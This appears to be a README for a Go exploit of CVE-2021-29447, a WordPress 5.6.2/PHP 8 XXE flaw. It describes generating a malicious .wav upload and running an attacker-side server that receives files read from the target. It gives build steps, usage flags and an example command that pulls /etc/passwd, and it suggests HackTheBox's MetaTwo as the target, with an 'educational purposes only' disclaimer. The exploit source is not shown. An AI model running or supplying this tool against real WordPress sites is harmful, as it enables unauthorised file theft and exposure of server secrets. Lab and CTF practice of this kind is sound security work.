For educational purposes only.
This exploit is supposed to be really convenient tool to get any file from server running wordpress 5.6.2 and php8. (see https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)
All you need is base wp-admin access and ability to upload a media file.
The exploit will generate a .wav file payload to upload using wp-admin.
Then it uses exploit's back server to give you eager file right on your console.
The perfect usage is HackTheBox's machine - metatwo https://www.hackthebox.com/machines/metatwo
$ go build
$ chmod +x exploit_cve-2021-29447
$ ./exploit_cve-2021-29447 --help
Usage of ./exploit_cve-2021-29447:
-local-server-ip string
Use local server ip where a local server will be set
-local-server-port int
Use local server port to run local server on
-o string
Output file to save exploit's result
-target-path string
Use target path to point on file you want to get from target server
$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd